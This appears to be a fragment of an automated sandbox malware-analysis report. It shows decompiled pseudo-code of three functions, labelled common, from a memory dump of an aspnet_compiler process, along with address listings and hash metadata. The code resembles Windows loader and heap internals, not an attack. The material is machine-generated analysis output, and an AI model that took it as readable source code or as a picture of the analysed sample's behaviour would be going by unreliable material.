								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1337b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E012837C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1337b9c; // 0x0
									_t214 = L01264620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E012837F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1337b10 =  *0x1337b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1337b04 =  *0x1337b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L012677F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L012677F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1337b08 =  *0x1337b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E012857C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0128F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L012677F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0127A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L012677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E012896C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0125849b
0x0125849b
0x0125849b
0x0125849b
0x0125849d
0x012584a2
0x012584a7
0x012584b1
0x012584d8
0x00000000
0x012584b3
0x012584c4
0x012584c9
0x012584cd
0x012584cf
0x012584cf
0x012584d6
0x012584e6
0x012584e9
0x012584ec
0x012584ef
0x012584f2
0x012584f4
0x012584fc
0x01258501
0x01258506
0x01258509
0x012586e0
0x012586e5
0x012586e8
0x012586ed
0x012586f0
0x012586f2
0x012a9afd
0x012a9b02
0x012584da
0x012584df
0x012584df
0x012586fa
0x012586fd
0x012586fe
0x01258701
0x01258706
0x01258709
0x0125870b
0x00000000
0x00000000
0x01258711
0x01258725
0x01258727
0x0125872a
0x0125872c
0x012a9af0
0x012a9af5
0x01258732
0x01258732
0x01258732
0x01258735
0x01258737
0x01258515
0x01258515
0x01258518
0x0125851d
0x01258523
0x01258527
0x0125852b
0x01258537
0x01258539
0x0125853c
0x0125853e
0x0125868c
0x01258691
0x01258699
0x0125869b
0x01258744
0x01258748
0x012586a1
0x012586a1
0x012586a1
0x012586a4
0x012586a8
0x012a9bdf
0x012a9bdf
0x012586ae
0x012586b0
0x00000000
0x012586b6
0x00000000
0x012a9be9
0x012586b0
0x01258544
0x0125854a
0x0125854d
0x01258551
0x0125876e
0x01258778
0x0125877b
0x01258780
0x01258557
0x01258557
0x0125855d
0x0125855d
0x0125856b
0x0125856e
0x01258570
0x01258573
0x01258576
0x01258576
0x01258579
0x0125857b
0x00000000
0x00000000
0x01258581
0x012585a0
0x012585a2
0x012585a5
0x012585a7
0x012a9b1b
0x012a9b1b
0x0125862e
0x0125862e
0x01258631
0x01258631
0x01258634
0x01258636
0x01258669
0x01258669
0x0125866b
0x012a9bbf
0x012a9bc4
0x012a9bc8
0x012a9bce
0x012a9bce
0x01258671
0x01258671
0x01258674
0x01258676
0x012a9bae
0x012a9bae
0x01258676
0x0125867c
0x0125867e
0x01258688
0x01258688
0x00000000
0x0125867e
0x01258638
0x01258638
0x0125863b
0x0125863e
0x0125863f
0x01258642
0x01258645
0x01258648
0x0125864d
0x012a9b69
0x012a9b6e
0x012a9b7b
0x012a9b81
0x012a9b85
0x012a9b89
0x012a9ba7
0x012a9b8b
0x012a9b91
0x012a9b9a
0x012a9b9f
0x012a9b9f
0x01258788
0x0125878d
0x01258763
0x01258763
0x01258766
0x00000000
0x01258766
0x012a9b70
0x00000000
0x012a9b70
0x01258656
0x0125865a
0x0125865c
0x01258752
0x01258756
0x00000000
0x00000000
0x0125875e
0x00000000
0x0125875e
0x01258662
0x01258662
0x01258662
0x01258666
0x00000000
0x01258666
0x012585b7
0x012585b9
0x012585bc
0x012585bf
0x012585cc
0x012585d1
0x012585d4
0x012585db
0x012585de
0x012585e0
0x012a9b5f
0x00000000
0x012a9b5f
0x012585e6
0x012585ea
0x012586c3
0x012586c5
0x012586c8
0x012586ca
0x012a9b16
0x00000000
0x012a9b16
0x012586d6
0x012585f6
0x012585f6
0x012585f9
0x01258602
0x01258606
0x0125860a
0x0125860b
0x0125860e
0x01258611
0x00000000
0x01258611
0x012585f3
0x00000000
0x012585f3
0x01258619
0x0125861e
0x0125861e
0x01258621
0x01258622
0x01258623
0x01258625
0x0125862c
0x00000000
0x0125873d
0x00000000
0x0125873d
0x01258737
0x0125850f
0x01258512
0x00000000
0x01258512
0x00000000
0x012584d6

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4b9f434fa313afd141a2a22664294ef56e89bb35809e15ea7c1b16479e764c
Instruction ID: 47a8d3dcaf7e0e65aa01d379dcbe71c2ea9f71a8590730cb901044ee27fae876
Opcode Fuzzy Hash: 6f4b9f434fa313afd141a2a22664294ef56e89bb35809e15ea7c1b16479e764c
Instruction Fuzzy Hash: 1DB15DB4E2020ADFDF19DF9AC9C4AADBBB9FF44304F10412AE905AB345D7B4A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0127513A Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0127513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x133d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0128D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01262280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01264620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0128F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0125FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x133b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0128B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x01275142
0x0127514c
0x01275150
0x01275157
0x01275159
0x0127515e
0x01275165
0x01275169
0x0127516c
0x01275172
0x01275176
0x0127517a
0x0127517a
0x0127517a
0x0127517f
0x012b6d8b
0x012b6d8e
0x012b6d91
0x012b6d95
0x012b6d98
0x012b6d9c
0x012b6da0
0x012b6da3
0x012b6da7
0x012b6e26
0x012b6e26
0x012b6e2a
0x012751f9
0x012751f9
0x012751fe
0x012b6e33
0x012b6e33
0x012b6e39
0x012b6e3d
0x012b6e46
0x012b6e50
0x00000000
0x00000000
0x012b6e52
0x012b6e53
0x012b6e56
0x012b6e5d
0x00000000
0x00000000
0x00000000
0x012b6e5f
0x012b6e67
0x012b6e77
0x012b6e7f
0x012b6e80
0x012b6e88
0x012b6e90
0x012b6e9f
0x012b6ea5
0x012b6ea9
0x012b6eb1
0x012b6ebf
0x00000000
0x00000000
0x012b6ecf
0x012b6ed3
0x00000000
0x00000000
0x012b6edb
0x012b6ede
0x012b6ee1
0x012b6ee8
0x012b6eeb
0x012b6eed
0x012b6ef0
0x012b6ef4
0x012b6ef8
0x012b6efc
0x00000000
0x00000000
0x012b6f0d
0x012b6f11
0x012b6f32
0x012b6f37
0x012b6f3b
0x012b6f3e
0x012b6f41
0x012b6f46
0x00000000
0x00000000
0x012b6f4c
0x012b6f50
0x012b6f50
0x012b6f54
0x012b6f62
0x012b6f65
0x012b6f6d
0x012b6f7b
0x012b6f7b
0x012b6f93
0x012b6f98
0x012b6fa0
0x012b6fa6
0x012b6fb3
0x012b6fb6
0x012b6fbf
0x012b6fc1
0x012b6fd5
0x012b6fda
0x012b6fda
0x012b6fdd
0x012b6fe2
0x012b6fe7
0x012b6feb
0x012b6fef
0x012b6ff3
0x0127520c
0x0127520c
0x0127520f
0x01275215
0x01275234
0x0127523a
0x0127523a
0x01275244
0x01275245
0x01275246
0x01275251
0x01275251
0x012b6f13
0x012b6f17
0x012b6f17
0x012b6f18
0x012b6f1b
0x012b6f1f
0x012b6f23
0x00000000
0x012b6f28
0x01275204
0x01275204
0x01275208
0x00000000
0x01275208
0x01275185
0x01275188
0x0127518a
0x0127518e
0x01275195
0x012b6db1
0x012b6db5
0x012b6db9
0x0127519b
0x0127519b
0x0127519e
0x012751a7
0x012751a9
0x012751a9
0x012751b5
0x012751b8
0x012751bb
0x012751be
0x012751c1
0x012751c5
0x012751c9
0x012751cd
0x012751cd
0x012751d8
0x012751dc
0x012751e0
0x012b6dcc
0x012b6dd0
0x012b6dd5
0x012b6ddd
0x012b6de1
0x012b6de1
0x012b6de5
0x012b6deb
0x012b6df1
0x012b6df7
0x012b6dfd
0x012b6e01
0x012b6e05
0x012b6e09
0x012b6e0d
0x012b6e11
0x012b6e11
0x012751eb
0x012b6e1a
0x012b6e1f
0x012b6e21
0x012b6e23
0x00000000
0x012751f1
0x012751f1
0x00000000
0x012751f1

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60068b532a80fc480a444d0842dee78c8fa507786ac7fda170480abffcc889ac
Instruction ID: 3b98d9084e17239d361132f554f18859614099931b0aa2022675f5c2ea821846
Opcode Fuzzy Hash: 60068b532a80fc480a444d0842dee78c8fa507786ac7fda170480abffcc889ac
Instruction Fuzzy Hash: B4C134755193818FD354CF28C580A6AFBF1BF88304F18896EF9998B392D771E985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 012703E2 Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E012703E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x133d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01270548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0128B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0125B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1337c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01267D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01267D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E012C7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01289830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E012C69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1337c04 != 0) {
						_t118 = _v12;
						_t120 = E012CA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1337bd8;
						if( *0x1337bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E012895D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E012899A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E012C3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0124B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0128AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1338474 - 3;
										if( *0x1338474 != 3) {
											 *0x13379dc =  *0x13379dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01267D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01267D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E012C7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1338708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1337b00; // 0x0
							asm("ror esi, cl");
							 *0x133b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E012895D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E01257F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x012703f1
0x012703f7
0x012703f9
0x012703fb
0x012703fd
0x01270400
0x0127040a
0x012b4c7a
0x01270537
0x01270547
0x01270410
0x01270410
0x01270414
0x01270417
0x0127041a
0x01270421
0x01270424
0x0127042b
0x0127043b
0x0127043e
0x0127043f
0x0127043f
0x01270446
0x01270449
0x0127044c
0x0127044f
0x01270459
0x012b4c8d
0x0127045f
0x0127045f
0x0127045f
0x01270467
0x012b4c97
0x012b4c9d
0x012b4ca4
0x012b4caa
0x012b4caf
0x012b4cb1
0x012b4cc3
0x012b4cb3
0x012b4cbc
0x012b4cbc
0x012b4cc8
0x012b4ccb
0x012b4cd7
0x012b4cda
0x012b4cdf
0x012b4cdf
0x012b4ccb
0x012b4ca4
0x0127046d
0x0127046f
0x0127046f
0x01270471
0x01270476
0x0127047a
0x0127047b
0x01270483
0x01270489
0x0127048d
0x00000000
0x00000000
0x012b4ce9
0x012b4cef
0x012b4d22
0x012b4d22
0x00000000
0x012b4d22
0x012b4cf1
0x012b4cf7
0x00000000
0x00000000
0x012b4cf9
0x012b4cff
0x00000000
0x00000000
0x012b4d05
0x012b4d07
0x00000000
0x00000000
0x012b4d0d
0x012b4d0f
0x012b4d14
0x012b4d16
0x00000000
0x00000000
0x012b4d1c
0x012b4d1c
0x01270499
0x01270535
0x01270535
0x00000000
0x01270535
0x012704a6
0x012b4d2c
0x012b4d37
0x012b4d39
0x012b4d3b
0x00000000
0x00000000
0x012b4d41
0x012b4d48
0x01270527
0x0127052b
0x0127052d
0x01270530
0x01270530
0x00000000
0x0127052b
0x012b4d4e
0x012704ac
0x012704ac
0x012704af
0x012704b2
0x012704b7
0x012704b9
0x012704bb
0x012704bd
0x012704bf
0x012704c5
0x012704c9
0x012b4d53
0x012b4d59
0x012b4db9
0x012b4dba
0x012b4dbf
0x012b4dc2
0x012b4dc4
0x012b4dc7
0x012b4dce
0x00000000
0x012b4dce
0x012b4d5b
0x012b4d61
0x00000000
0x00000000
0x012b4d63
0x012b4d69
0x00000000
0x00000000
0x012b4d6b
0x012b4d6e
0x012b4d74
0x012b4d76
0x012b4d7c
0x012b4d7e
0x012b4d84
0x012b4d89
0x012b4d8c
0x012b4d8d
0x012b4d92
0x012b4d95
0x012b4d96
0x012b4d98
0x012b4d9a
0x012b4d9f
0x012b4da4
0x012b4da6
0x012b4da8
0x012b4daf
0x012b4db1
0x012b4db1
0x012b4daf
0x012b4da6
0x012b4d84
0x012b4d7c
0x00000000
0x012b4d74
0x012704d6
0x012b4de1
0x012704dc
0x012704dc
0x012704dc
0x012704e4
0x012b4deb
0x012b4df1
0x012b4df8
0x012b4dfe
0x012b4e03
0x012b4e05
0x012b4e17
0x012b4e07
0x012b4e10
0x012b4e10
0x012b4e1c
0x012b4e1f
0x012b4e35
0x012b4e35
0x012b4e1f
0x012b4df8
0x012704f1
0x012704fa
0x012b4e3f
